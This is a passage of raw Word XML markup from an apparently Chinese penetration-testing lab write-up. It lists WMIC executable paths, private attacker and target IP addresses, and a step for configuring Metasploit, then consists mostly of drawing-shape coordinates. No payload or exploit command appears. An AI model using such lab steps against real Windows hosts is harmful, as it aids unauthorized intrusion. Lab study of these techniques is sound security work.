        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="22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7"/>
        </w:rPr>
        <w:t>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2003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6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19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\WINDOWS\system32\w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bem\wmic.exe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26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\WINDOWS\SysW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="25"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OW64\wbem\wmic.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="27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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> 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默认位置：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18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s\System32\wbem\WMIC.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23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24"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dows\SysWOW64\wbem\WMIC.exe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4121"/>
        </w:tabs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-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/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Debian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19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  </w:t>
      </w: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192.168.1.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>   </w:t>
      </w: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10"/>
        </w:rPr>
        <w:t> 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2003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10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tabs>
          <w:tab w:val="left" w:pos="4037"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="2161" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19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20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7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2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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>置攻击机msf：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346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="491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msf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show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2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19.500pt;margin-top:4.500pt;width:0.500pt;height:447.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,90" coordsize="10,8950">
        <v:shape style="position:absolute;left:10390;top:90;width:10;height:8950" coordorigin="10390,90" coordsize="10,8950" path="m10402,99l10402,99,10402,99,10402,99,10402,99,10402,99,10402,100,10402,100,10402,101,10402,102,10402,103,10402,104,10402,106,10402,108,10402,111,10402,114,10402,117,10402,121,10402,125,10402,130,10402,135,10402,142,10402,148,10402,156,10402,164,10402,172,10402,182,10402,192,10402,204,10402,216,10402,228,10402,242,10402,257,10402,273,10402,290,10402,308,10402,327,10402,347,10402,368,10402,390,10402,414,10402,439,10402,465,10402,492,10402,521,10402,551,10402,583,10402,616,10402,650,10402,686,10402,724,10402,763,10402,803,10402,845,10402,889,10402,935,10402,982,10402,1031,10402,1082,10402,1135,10402,1189,10402,1246,10402,1304,10402,1364,10402,1426,10402,1490,10402,1557,10402,1625,10402,1695,10402,1768,10402,1843,10402,1920,10402,1999,10402,2080,10402,2164,10402,2250,10402,2338,10402,2429,10402,2522,10402,2618,10402,2716,10402,2817,10402,2920,10402,3026,10402,3134,10402,3245,10402,3359,10402,3475,10402,3594,10402,3716,10402,3841,10402,3968,10402,4099,10402,4232,10402,4368,10402,4508,10402,4650,10402,4795,10402,4943,10402,5095,10402,5249,10402,5407,10402,5568,10402,5732,10402,5899,10402,6070,10402,6244,10402,6421,10402,6601,10402,6785,10402,6973,10402,7164,10402,7358,10402,7556,10402,7758,10402,7963,10402,8172,10402,8384,10402,8600,10402,8820,10402,9044e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:390" coordorigin="1490,970" coordsize="8990,39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0,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1024,10484,1026,10484,1027,10484,1029,10484,1031,10484,1033,10484,1035,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1048,10484,1050,10484,1053,10484,1055,10484,1058,10484,1061,10484,1064,10484,1066,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1113,10484,1118,10484,1122,10484,1127,10484,1131,10484,1136,10484,1141,10484,1146,10484,1151,10484,1156,10484,1162,10484,1167,10484,1173,10484,1179,10484,1184,10484,1190,10484,1196,10484,1203,10484,1209,10484,1216,10484,1222,10484,1229,10484,1236,10484,1243,10484,1250,10484,1257,10484,1265,10484,1272,10484,1280,10484,1288,10484,1296,10484,1304,10484,1312,10484,1321,10484,1329,10484,1338,10484,1347,10484,1356,10484,1365,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10483,1375,10482,1375,10482,1375,10480,1375,10479,1375,10477,1375,10475,1375,10473,1375,10470,1375,10466,1375,10462,1375,10458,1375,10453,1375,10448,1375,10442,1375,10435,1375,10428,1375,10419,1375,10411,1375,10401,1375,10391,1375,10379,1375,10367,1375,10354,1375,10340,1375,10326,1375,10310,1375,10293,1375,10275,1375,10256,1375,10236,1375,10215,1375,10192,1375,10168,1375,10143,1375,10117,1375,10090,1375,10061,1375,10031,1375,9999,1375,9966,1375,9931,1375,9895,1375,9858,1375,9819,1375,9778,1375,9735,1375,9691,1375,9646,1375,9598,1375,9549,1375,9498,1375,9445,1375,9391,1375,9334,1375,9275,1375,9215,1375,9153,1375,9088,1375,9022,1375,8953,1375,8883,1375,8810,1375,8735,1375,8658,1375,8578,1375,8497,1375,8413,1375,8326,1375,8238,1375,8146,1375,8053,1375,7957,1375,7859,1375,7758,1375,7654,1375,7548,1375,7439,1375,7328,1375,7214,1375,7097,1375,6977,1375,6855,1375,6730,1375,6602,1375,6471,1375,6337,1375,6201,1375,6061,1375,5918,1375,5773,1375,5624,1375,5472,1375,5317,1375,5159,1375,4997,1375,4833,1375,4665,1375,4494,1375,4319,1375,4141,1375,3960,1375,3776,1375,3587,1375,3396,1375,3201,1375,3002,1375,2800,1375,2594,1375,2385,1375,2172,1375,1955,1375,1734,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1373,1510,1373,1510,1373,1510,1373,1510,1372,1510,1372,1510,1372,1510,1371,1510,1371,1510,1370,1510,1370,1510,1369,1510,1369,1510,1368,1510,1367,1510,1367,1510,1366,1510,1365,1510,1364,1510,1363,1510,1362,1510,1361,1510,1360,1510,1359,1510,1358,1510,1357,1510,1356,1510,1354,1510,1353,1510,1352,1510,1350,1510,1348,1510,1347,1510,1345,1510,1343,1510,1342,1510,1340,1510,1338,1510,1336,1510,1333,1510,1331,1510,1329,1510,1327,1510,1324,1510,1322,1510,1319,1510,1316,1510,1314,1510,1311,1510,1308,1510,1305,1510,1302,1510,1298,1510,1295,1510,1292,1510,1288,1510,1284,1510,1281,1510,1277,1510,1273,1510,1269,1510,1265,1510,1261,1510,1256,1510,1252,1510,1247,1510,1243,1510,1238,1510,1233,1510,1228,1510,1223,1510,1218,1510,1212,1510,1207,1510,1201,1510,1196,1510,1190,1510,1184,1510,1178,1510,1171,1510,1165,1510,1159,1510,1152,1510,1145,1510,1138,1510,1131,1510,1124,1510,1117,1510,1110,1510,1102,1510,1094,1510,1086,1510,1078,1510,1070,1510,1062,1510,1053,1510,1045,1510,1036,1510,1027,1510,1018,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:390" coordorigin="1490,990" coordsize="30,390" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1020,1517,1021,1517,1023,1517,1024,1517,1026,1517,1027,1517,1029,1517,1031,1517,1033,1517,1035,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1048,1517,1050,1517,1053,1517,1055,1517,1058,1517,1061,1517,1064,1517,1066,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1090,1517,1093,1517,1097,1517,1101,1517,1105,1517,1109,1517,1113,1517,1118,1517,1122,1517,1127,1517,1131,1517,1136,1517,1141,1517,1146,1517,1151,1517,1156,1517,1162,1517,1167,1517,1173,1517,1179,1517,1184,1517,1190,1517,1196,1517,1203,1517,1209,1517,1216,1517,1222,1517,1229,1517,1236,1517,1243,1517,1250,1517,1257,1517,1265,1517,1272,1517,1280,1517,1288,1517,1296,1517,1304,1517,1312,1517,1321,1517,1329,1517,1338,1517,1347,1517,1356,1517,1365,1517,1375e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:67.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:350" coordorigin="1490,1350" coordsize="8990,350" path="m1510,1375l1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1511,1375,1512,1375,1512,1375,1514,1375,1515,1375,1517,1375,1519,1375,1521,1375,1524,1375,1528,1375,1532,1375,1536,1375,1541,1375,1546,1375,1552,1375,1559,1375,1566,1375,1575,1375,1583,1375,1593,1375,1603,1375,1615,1375,1627,1375,1640,1375,1654,1375,1668,1375,1684,1375,1701,1375,1719,1375,1738,1375,1758,1375,1780,1375,1802,1375,1826,1375,1851,1375,1877,1375,1904,1375,1933,1375,1963,1375,1995,1375,2028,1375,2063,1375,2099,1375,2136,1375,2175,1375,2216,1375,2259,1375,2303,1375,2348,1375,2396,1375,2445,1375,2496,1375,2549,1375,2604,1375,2660,1375,2719,1375,2779,1375,2841,1375,2906,1375,2972,1375,3041,1375,3112,1375,3184,1375,3259,1375,3336,1375,3416,1375,3498,1375,3582,1375,3668,1375,3757,1375,3848,1375,3941,1375,4037,1375,4136,1375,4236,1375,4340,1375,4446,1375,4555,1375,4666,1375,4780,1375,4897,1375,5017,1375,5139,1375,5264,1375,5392,1375,5523,1375,5657,1375,5793,1375,5933,1375,6076,1375,6222,1375,6370,1375,6522,1375,6677,1375,6835,1375,6997,1375,7161,1375,7329,1375,7500,1375,7675,1375,7853,1375,8034,1375,8219,1375,8407,1375,8598,1375,8793,1375,8992,1375,9194,1375,9400,1375,9609,1375,9823,1375,10039,1375,10260,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1390,10484,1391,10484,1393,10484,1394,10484,1395,10484,1396,10484,1398,10484,1399,10484,1401,10484,1402,10484,1404,10484,1406,10484,1407,10484,1409,10484,1411,10484,1413,10484,1415,10484,1417,10484,1419,10484,1421,10484,1424,10484,1426,10484,1428,10484,1431,10484,1434,10484,1436,10484,1439,10484,1442,10484,1445,10484,1448,10484,1451,10484,1454,10484,1457,10484,1461,10484,1464,10484,1468,10484,1471,10484,1475,10484,1479,10484,1483,10484,1487,10484,1491,10484,1495,10484,1499,10484,1504,10484,1508,10484,1513,10484,1518,10484,1522,10484,1527,10484,1532,10484,1537,10484,1543,10484,1548,10484,1554,10484,1559,10484,1565,10484,1571,10484,1577,10484,1583,10484,1589,10484,1595,10484,1601,10484,1608,10484,1615,10484,1622,10484,1628,10484,1635,10484,1643,10484,1650,10484,1657,10484,1665,10484,1673,10484,1681,10484,1688,10484,1697,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10483,1705,10482,1705,10482,1705,10480,1705,10479,1705,10477,1705,10475,1705,10473,1705,10470,1705,10466,1705,10462,1705,10458,1705,10453,1705,10448,1705,10442,1705,10435,1705,10428,1705,10419,1705,10411,1705,10401,1705,10391,1705,10379,1705,10367,1705,10354,1705,10340,1705,10326,1705,10310,1705,10293,1705,10275,1705,10256,1705,10236,1705,10215,1705,10192,1705,10168,1705,10143,1705,10117,1705,10090,1705,10061,1705,10031,1705,9999,1705,9966,1705,9931,1705,9895,1705,9858,1705,9819,1705,9778,1705,9735,1705,9691,1705,9646,1705,9598,1705,9549,1705,9498,1705,9445,1705,9391,1705,9334,1705,9275,1705,9215,1705,9153,1705,9088,1705,9022,1705,8953,1705,8883,1705,8810,1705,8735,1705,8658,1705,8578,1705,8497,1705,8413,1705,8326,1705,8238,1705,8146,1705,8053,1705,7957,1705,7859,1705,7758,1705,7654,1705,7548,1705,7439,1705,7328,1705,7214,1705,7097,1705,6977,1705,6855,1705,6730,1705,6602,1705,6471,1705,6337,1705,6201,1705,6061,1705,5918,1705,5773,1705,5624,1705,5472,1705,5317,1705,5159,1705,4997,1705,4833,1705,4665,1705,4494,1705,4319,1705,4141,1705,3960,1705,3776,1705,3587,1705,3396,1705,3201,1705,3002,1705,2800,1705,2594,1705,2385,1705,2172,1705,1955,1705,1734,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1703,1510,1703,1510,1703,1510,1702,1510,1702,1510,1702,1510,1701,1510,1701,1510,1701,1510,1700,1510,1700,1510,1699,1510,1698,1510,1698,1510,1697,1510,1696,1510,1696,1510,1695,1510,1694,1510,1693,1510,1692,1510,1691,1510,1690,1510,1689,1510,1688,1510,1687,1510,1686,1510,1685,1510,1683,1510,1682,1510,1680,1510,1679,1510,1677,1510,1676,1510,1674,1510,1672,1510,1670,1510,1669,1510,1667,1510,1665,1510,1663,1510,1660,1510,1658,1510,1656,1510,1653,1510,1651,1510,1649,1510,1646,1510,1643,1510,1640,1510,1638,1510,1635,1510,1632,1510,1629,1510,1625,1510,1622,1510,1619,1510,1615,1510,1612,1510,1608,1510,1605,1510,1601,1510,1597,1510,1593,1510,1589,1510,1585,1510,1580,1510,1576,1510,1571,1510,1567,1510,1562,1510,1557,1510,1552,1510,1547,1510,1542,1510,1537,1510,1532,1510,1526,1510,1520,1510,1515,1510,1509,1510,1503,1510,1497,1510,1491,1510,1484,1510,1478,1510,1472,1510,1465,1510,1458,1510,1451,1510,1444,1510,1437,1510,1430,1510,1422,1510,1415,1510,1407,1510,1399,1510,1391,1510,1383,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:330" coordorigin="1490,1370" coordsize="30,330" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1379,1517,1379,1517,1379,1517,1380,1517,1381,1517,1381,1517,1382,1517,1382,1517,1383,1517,1384,1517,1385,1517,1385,1517,1386,1517,1387,1517,1388,1517,1389,1517,1390,1517,1391,1517,1393,1517,1394,1517,1395,1517,1396,1517,1398,1517,1399,1517,1401,1517,1402,1517,1404,1517,1406,1517,1407,1517,1409,1517,1411,1517,1413,1517,1415,1517,1417,1517,1419,1517,1421,1517,1424,1517,1426,1517,1428,1517,1431,1517,1434,1517,1436,1517,1439,1517,1442,1517,1445,1517,1448,1517,1451,1517,1454,1517,1457,1517,1461,1517,1464,1517,1468,1517,1471,1517,1475,1517,1479,1517,1483,1517,1487,1517,1491,1517,1495,1517,1499,1517,1504,1517,1508,1517,1513,1517,1518,1517,1522,1517,1527,1517,1532,1517,1537,1517,1543,1517,1548,1517,1554,1517,1559,1517,1565,1517,1571,1517,1577,1517,1583,1517,1589,1517,1595,1517,1601,1517,1608,1517,1615,1517,1622,1517,1628,1517,1635,1517,1643,1517,1650,1517,1657,1517,1665,1517,1673,1517,1681,1517,1688,1517,1697,1517,1705e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:84.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1690" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1690;width:8990;height:390" coordorigin="1490,1690" coordsize="8990,390" path="m1510,1705l1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1510,1705,1511,1705,1512,1705,1512,1705,1514,1705,1515,1705,1517,1705,1519,1705,1521,1705,1524,1705,1528,1705,1532,1705,1536,1705,1541,1705,1546,1705,1552,1705,1559,1705,1566,1705,1575,1705,1583,1705,1593,1705,1603,1705,1615,1705,1627,1705,1640,1705,1654,1705,1668,1705,1684,1705,1701,1705,1719,1705,1738,1705,1758,1705,1780,1705,1802,1705,1826,1705,1851,1705,1877,1705,1904,1705,1933,1705,1963,1705,1995,1705,2028,1705,2063,1705,2099,1705,2136,1705,2175,1705,2216,1705,2259,1705,2303,1705,2348,1705,2396,1705,2445,1705,2496,1705,2549,1705,2604,1705,2660,1705,2719,1705,2779,1705,2841,1705,2906,1705,2972,1705,3041,1705,3112,1705,3184,1705,3259,1705,3336,1705,3416,1705,3498,1705,3582,1705,3668,1705,3757,1705,3848,1705,3941,1705,4037,1705,4136,1705,4236,1705,4340,1705,4446,1705,4555,1705,4666,1705,4780,1705,4897,1705,5017,1705,5139,1705,5264,1705,5392,1705,5523,1705,5657,1705,5793,1705,5933,1705,6076,1705,6222,1705,6370,1705,6522,1705,6677,1705,6835,1705,6997,1705,7161,1705,7329,1705,7500,1705,7675,1705,7853,1705,8034,1705,8219,1705,8407,1705,8598,1705,8793,1705,8992,1705,9194,1705,9400,1705,9609,1705,9823,1705,10039,1705,10260,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1705,10484,1706,10484,1706,10484,1706,10484,1706,10484,1706,10484,1707,10484,1707,10484,1707,10484,1708,10484,1708,10484,1708,10484,1709,10484,1709,10484,1710,10484,1710,10484,1711,10484,1711,10484,1712,10484,1713,10484,1714,10484,1714,10484,1715,10484,1716,10484,1717,10484,1718,10484,1719,10484,1720,10484,1721,10484,1723,10484,1724,10484,1725,10484,1727,10484,1728,10484,1729,10484,1731,10484,1733,10484,1734,10484,1736,10484,1738,10484,1740,10484,1742,10484,1744,10484,1746,10484,1748,10484,1751,10484,1753,10484,1755,10484,1758,10484,1761,10484,1763,10484,1766,10484,1769,10484,1772,10484,1775,10484,1778,10484,1781,10484,1785,10484,1788,10484,1791,10484,1795,10484,1799,10484,1803,10484,1807,10484,1811,10484,1815,10484,1819,10484,1823,10484,1828,10484,1832,10484,1837,10484,1842,10484,1846,10484,1851,10484,1857,10484,1862,10484,1867,10484,1873,10484,1878,10484,1884,10484,1890,10484,1896,10484,1902,10484,1908,10484,1914,10484,1921,10484,1927,10484,1934,10484,1941,10484,1948,10484,1955,10484,1963,10484,1970,10484,1978,10484,1985,10484,1993,10484,2001,10484,2009,10484,2018,10484,2026,10484,2035,10484,2043,10484,2052,10484,2061,10484,2071,10484,2080,10484,2080,10484,2080,10484,2080,10484,2080,10484,2080,10484,2080,10483,2080,10482,2080,10482,2080,10480,2080,10479,2080,10477,2080,10475,2080,10473,2080,10470,2080,10466,2080,10462,2080,10458,2080,10453,2080,10448,2080,10442,2080,10435,2080,10428,2080,10419,2080,10411,2080,10401,2080,10391,2080,10379,2080,10367,2080,10354,2080,10340,2080,10326,2080,10310,2080,10293,2080,10275,2080,10256,2080,10236,2080,10215,2080,10192,2080,10168,2080,10143,2080,10117,2080,10090,2080,10061,2080,10031,2080,9999,2080,9966,2080,9931,2080,9895,2080,9858,2080,9819,2080,9778,2080,9735,2080,9691,2080,9646,2080,9598,2080,9549,2080,9498,2080,9445,2080,9391,2080,9334,2080,9275,2080,9215,2080,9153,2080,9088,2080,9022,2080,8953,2080,8883,2080,8810,2080,8735,2080,8658,2080,8578,2080,8497,2080,8413,2080,8326,2080,8238,2080,8146,2080,8053,2080,7957,2080,7859,2080,7758,2080,7654,2080,7548,2080,7439,2080,7328,2080,7214,2080,7097,2080,6977,2080,6855,2080,6730,2080,6602,2080,6471,2080,6337,2080,6201,2080,6061,2080,5918,2080,5773,2080,5624,2080,5472,2080,5317,2080,5159,2080,4997,2080,4833,2080,4665,2080,4494,2080,4319,2080,4141,2080,3960,2080,3776,2080,3587,2080,3396,2080,3201,2080,3002,2080,2800,2080,2594,2080,2385,2080,2172,2080,1955,2080,1734,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2080,1510,2079,1510,2079,1510,2079,1510,2079,1510,2079,1510,2079,1510,2078,1510,2078,1510,2078,1510,2077,1510,2077,1510,2077,1510,2076,1510,2076,1510,2075,1510,2075,1510,2074,1510,2073,1510,2073,1510,2072,1510,2071,1510,2070,1510,2070,1510,2069,1510,2068,1510,2067,1510,2066,1510,2065,1510,2064,1510,2062,1510,2061,1510,2060,1510,2058,1510,2057,1510,2055,1510,2054,1510,2052,1510,2051,1510,2049,1510,2047,1510,2045,1510,2043,1510,2041,1510,2039,1510,2037,1510,2034,1510,2032,1510,2030,1510,2027,1510,2024,1510,2022,1510,2019,1510,2016,1510,2013,1510,2010,1510,2007,1510,2004,1510,2000,1510,1997,1510,1993,1510,1990,1510,1986,1510,1982,1510,1978,1510,1974,1510,1970,1510,1966,1510,1962,1510,1957,1510,1953,1510,1948,1510,1943,1510,1938,1510,1933,1510,1928,1510,1923,1510,1918,1510,1912,1510,1907,1510,1901,1510,1895,1510,1889,1510,1883,1510,1877,1510,1870,1510,1864,1510,1857,1510,1851,1510,1844,1510,1837,1510,1830,1510,1822,1510,1815,1510,1807,1510,1800,1510,1792,1510,1784,1510,1776,1510,1767,1510,1759,1510,1750,1510,1741,1510,1733,1510,1723,1510,1714,1510,1705e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:84.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1690" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:1690;width:30;height:390" coordorigin="1490,1690" coordsize="30,390" path="m1517,1705l1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1706,1517,1706,1517,1706,1517,1706,1517,1706,1517,1707,1517,1707,1517,1707,1517,1708,1517,1708,1517,1708,1517,1709,1517,1709,1517,1710,1517,1710,1517,1711,1517,1711,1517,1712,1517,1713,1517,1714,1517,1714,1517,1715,1517,1716,1517,1717,1517,1718,1517,1719,1517,1720,1517,1721,1517,1723,1517,1724,1517,1725,1517,1727,1517,1728,1517,1729,1517,1731,1517,1733,1517,1734,1517,1736,1517,1738,1517,1740,1517,1742,1517,1744,1517,1746,1517,1748,1517,1751,1517,1753,1517,1755,1517,1758,1517,1761,1517,1763,1517,1766,1517,1769,1517,1772,1517,1775,1517,1778,1517,1781,1517,1785,1517,1788,1517,1791,1517,1795,1517,1799,1517,1803,1517,1807,1517,1811,1517,1815,1517,1819,1517,1823,1517,1828,1517,1832,1517,1837,1517,1842,1517,1846,1517,1851,1517,1857,1517,1862,1517,1867,1517,1873,1517,1878,1517,1884,1517,1890,1517,1896,1517,1902,1517,1908,1517,1914,1517,